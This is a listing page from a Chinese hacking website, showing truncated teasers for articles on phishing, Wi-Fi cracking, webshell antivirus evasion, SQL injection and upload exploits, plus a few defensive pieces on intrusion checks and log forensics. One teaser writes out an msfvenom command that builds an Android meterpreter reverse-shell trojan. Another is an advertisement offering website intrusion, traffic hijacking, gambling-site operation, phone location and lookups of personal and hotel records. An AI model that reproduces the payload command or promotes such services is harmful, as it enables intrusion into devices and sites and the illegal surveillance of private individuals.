黑客技术 - CNHACK 黑客技术 - CNHACK

黑客技术

黑客技术

2020年黑客首选10大Windows网络攻击技术

中文黑客网 发布于 5-10

RedCanary近期公布了《 2021ThreatDetectionReport》,该报告涵盖了众多顶级网络攻击技术到MITERATT&CK框架的映射。其中,就2020年黑客首选10大Windows网络攻击技术进行了调研。1、24%:命令行解释器PowerShell利用PowerShell和WindowsCommandShell的攻击...

阅读(472) 评论(0)

黑客技术

linux操作系统入侵检查流程

50

中文黑客网 发布于 4-28

1检查概述由于无法站在攻击者视角审视其做过哪些攻击行为,因此标准化的检查内容可以规避非标准化的风险,例如操作系统虽然没有异常登录日志,但如果不检查操作系统用户即会存在遗漏从而产生风险。同时也可规避上次检查ab内容,本次检查bc内容的非标准化风险。因此无论每个人的标准是否统一,取长补短逐渐完善自己的标准化是建议进行的。linux操作系统入侵检查流程...

阅读(362) 评论(0)

黑客技术

九年专业安全团队承接渗透入侵维护服务

中文黑客网 发布于 4-20

承接服务:网站入侵/黑盒,白盒渗透测试/代码审计/流量劫持/GP/BC站点/服务器一条龙维护。BC棋牌站点搭建,提供全天技术支持。九年专业安全技术团队,从业六年BC渗透/维护经验。专业手机定位/个人信息查询/开房记录等一切查询业务。只接一手单子,二手/中介勿扰谢谢!联系方式:联系QQ:918538(注明来意)非诚勿扰,添加好友洽谈合作详情!

阅读(1091) 评论(0)

黑客技术

红蓝对抗钓鱼篇之从入门到放弃

62

中文黑客网 发布于 4-19

前言上一章讲到邮件服务器的搭建和使用,那么这章就具体讲解利用方式。在大型企业边界安全做的越来越好的情况下,不管是APT攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。钓鱼往往需要免杀技术的支撑,但本章只讲述钓鱼和些许免杀技术,免杀系列学习在后续讲解。一、钓鱼小技巧1.1LNK快捷方式lnk文件是用于指向其他文件的一种文件。这些文件通常称为快...

阅读(372) 评论(0)

黑客技术

这些黑客技术你也能轻松看懂

中文黑客网 发布于 4-18

黑客技术总被渲染的很炫酷。但其实作为普通人的你我也能了解其中的道道。多了解一些,安全上网,保护自己的数据安全。 1、键盘捕获进行键盘捕获而使用的工具中有软件和硬件,都可以把按键顺序记录在日志文件里,还有可能记录个人邮箱和密码。 软件的话比较有名的是Keylogger,主要针对安装的程序来获取按键顺序等信息。而硬件主要通过电磁辐...

阅读(472) 评论(0)

黑客技术

黑客报道:Chrome再次被曝0day漏洞

3

中文黑客网 发布于 4-16

一波未平一波又起,4月13日有安全人员在Twitter上公布了Chrome的0day漏洞PoC。该漏洞可以启动计算器应用程序,一时间好友圈里都被计算器刷屏了。但没想到仅隔一天,在4月14日,Chrome又被曝了第二个0day漏洞。并且其PoC同样也被安全人员在Twitter上公开。据悉,该漏洞影响了Chrome最新正式版(89.0.4389.12...

阅读(307) 评论(0)

黑客技术

黑客技术学习:不同黑客入侵网站的基本步骤是什么?

1

中文黑客网 发布于 4-12

如何入侵指定网站,入侵网站应该有什么样的步骤,相信很多朋友都不知道黑客是如何入侵网站的,接下来黑客信息网来给大家科普科普不同的黑客都是怎么样去入侵网站的,首先入侵指定网站是需要条件的,入侵前一定要先观察这个网站是动态还是静态的。介绍下什么样站点可以入侵:我认为必须是动态的网站如ASP、PHP、JSP等代码编写的站点,如果是静态的(.htm或htm...

阅读(411) 评论(0)

黑客技术

aircrack-ng无线网WIFI破解教程

11

中文黑客网 发布于 4-9

一直准备找个时间来写个wifi破解教程,因为很多人都想学wifi破解,但是网上的教程都太乱,而且弄来弄错容易错,那是对于wifi破解的原理没有充分的认识,这次准备纯码字给大家通俗的讲解wifi破解,破解工具以aircrack-ng为例,这是一个很强大且具有代表性的工具,网上很多其他的破解工具都是基于aircrack-ng的。名词解释无线AP:发射...

阅读(538) 评论(0)

黑客技术

使用kali生成木马入侵安卓手机

7

中文黑客网 发布于 4-9

行动开始先查看kali的ip,我的是1.114 然后输入命令:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=你kali的ipLPORT=5555R>/root/apk.apk5555是设置的端口,可以自己更改  显示这个说明已经生成成功了 然后启动msf...

阅读(594) 评论(0)

黑客技术

从Web日志还原SQL注入拖走的数据

1

中文黑客网 发布于 4-8

利用SQL注入漏洞拖库,从而导致数据泄漏。一般的排查方式,我们可以使用关键字进行搜索,找到可疑的url尝试进行漏洞复现,通过Web访问日志来还原攻击路径,从而确定问题的根源。但是,有一个问题却一直困扰着我,攻击者通过SQL注入漏洞到底获取了什么数据?是所有的数据,还只是访问了其中的一张表?理论上,假设所有的url参数请求日志都记录完整的话,只需要...

阅读(237) 评论(0)

黑客技术

常见网站劫持案例及解析

3

中文黑客网 发布于 4-8

攻击者在入侵网站后,常常会通过恶意劫持流量来获取收益,从而实现流量变现。有一些黑帽劫持的手法堪称防不胜防,正常的访问行为很难发现异常。今天给大家分享一下常见的网站劫持手法和排查思路。我们可以按照基于不同隐藏目的的常见劫持手法,来做一个简单的分类:1、将爬虫与用户正常访问分开,实现搜索引擎快照劫持2、将移动端与PC端的访问分开,实现移动端的流量劫持...

阅读(282) 评论(0)

黑客技术

自主搭建的三层网络域渗透靶场打靶记录

62

中文黑客网 发布于 4-3

前言假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场。靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。目前此靶场已在vulnstack开源,下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/文中若有不当之处还请各位大佬多多点评我的博客:https://whoamianony...

阅读(288) 评论(0)

黑客技术

2021年黑客攻防演练信息收集实战技巧

17

中文黑客网 发布于 4-3

前言攻防演练里最重要的环节莫过于信息收集,熟话说,要想打点打得好,信息收集少不了。在各大公司招兵买马之际,各位师傅也来查缺补漏,信息收集你真的都会了嘛?搜索引擎这里我们使用fofa来举例,为什么使用fofa来举例呢,不是因为fofa有多好(真香),是因为咱只买了fofa的会员。fofa既可以搜索到部分子域名,也可以搜索到目标的各种系统,如OA、后...

阅读(302) 评论(0)

黑客技术

黑客技术webshell免杀的技巧

15

中文黑客网 发布于 3-27

0x00:前言由于杀软的规则在不断更新所以很多之前的过杀软方法基本上都不行了而且随着php7逐渐扩张assert马也将被淘汰所以本文将提出几种免杀思路效果很好而且不会被杀软的正则和沙盒规则约束。0x01:自定义加密Bypass部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则比如某dir+比如这个都能被检测出是shel...

阅读(382) 评论(0)

黑客技术

黑客基本术语

中文黑客网 发布于 3-27

溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码)社工:社会工程学一种通过对受害者心理弱点、本能反应、好奇...

阅读(416) 评论(0)

黑客技术

新人零基础接触黑客知识的学习方法

中文黑客网 发布于 3-21

今天有许多人问我:“我看了你的文章了,但是我是新人,有没有什么学习方法啊?”我回答的是;“当然有啊,不过人和人不同,方法是自己总结出来的,就和我前面文章中介绍的名词一样,都是我在学习中根据自己的经验和对他的认识总结出来的。”下面呢我就把我自己的学习经验写出来给大家参考下,大家可以根据我的方法去总结套...

阅读(619) 评论(0)

黑客技术

新手零基础黑客技术学习之上传漏洞

中文黑客网 发布于 3-21

上传漏洞是在一个ASP页面后面输入upfile.asp然后看回显,(注意一点:就是在加这个后缀前,把IE中友好显示关了!要不没有效果的!)如果没有显示或者出现个什么“请登陆后使用”这样的呢,就是没有漏洞的拉。那么有漏洞的回显是什么样子的呢?如果有漏洞你会看到上面有个这样的字  请先选择你要上传的文件[重新上传]如果看到这个...

阅读(351) 评论(0)

黑客技术

新手零基础黑客技术学习之注入漏洞的利用

中文黑客网 发布于 3-21

上一节讲了暴库漏洞,现在来讲讲注入,现在注入漏洞简直多的和蚂蚁一样,随便找个站,就可能利用注入漏洞得到后台或者WEBSHELL,所以我们怎么能忽视这个漏洞呢?呵呵.下面就是介绍注入漏洞的用法。  在前面介绍过怎样辨别网站有注入漏洞,现在再来讲下,加深下印象,现在举的例子,比如我们检测的是这个站http://www.123.com/那么我们就先大概...

阅读(282) 评论(0)

黑客技术

新手零基础黑客技术学习之利用暴库漏洞

中文黑客网 发布于 3-21

今天就来讲下以前的一个漏洞,但是很经典,现在也有不少网站仍然存在这样的漏洞。就是暴库漏洞。  什么是暴库呢?就是利用不正当的手段使对方把数据库的绝对路经显示出来,然后我门知道了绝对路径,就可以下载下来,这样这个网站的数据库中的资料就被我门轻松掌握了。  那么怎么样使用暴库呢?这个在新人2中有介绍,今天就来说说具体的用法。首先要知道怎样才能暴库呢?...

阅读(295) 评论(0)

黑客技术

新手零基础黑客技术学习之入侵知识

中文黑客网 发布于 3-21

首先介绍下什么样的站点可以入侵:必须是动态的网站比如asp php jsp这种形式的站点后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0)  入侵介绍:1。上传漏洞2。暴库3。注入4。旁注5。COOKIE诈骗  1:上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHE...

阅读(345) 评论(0)

sitemap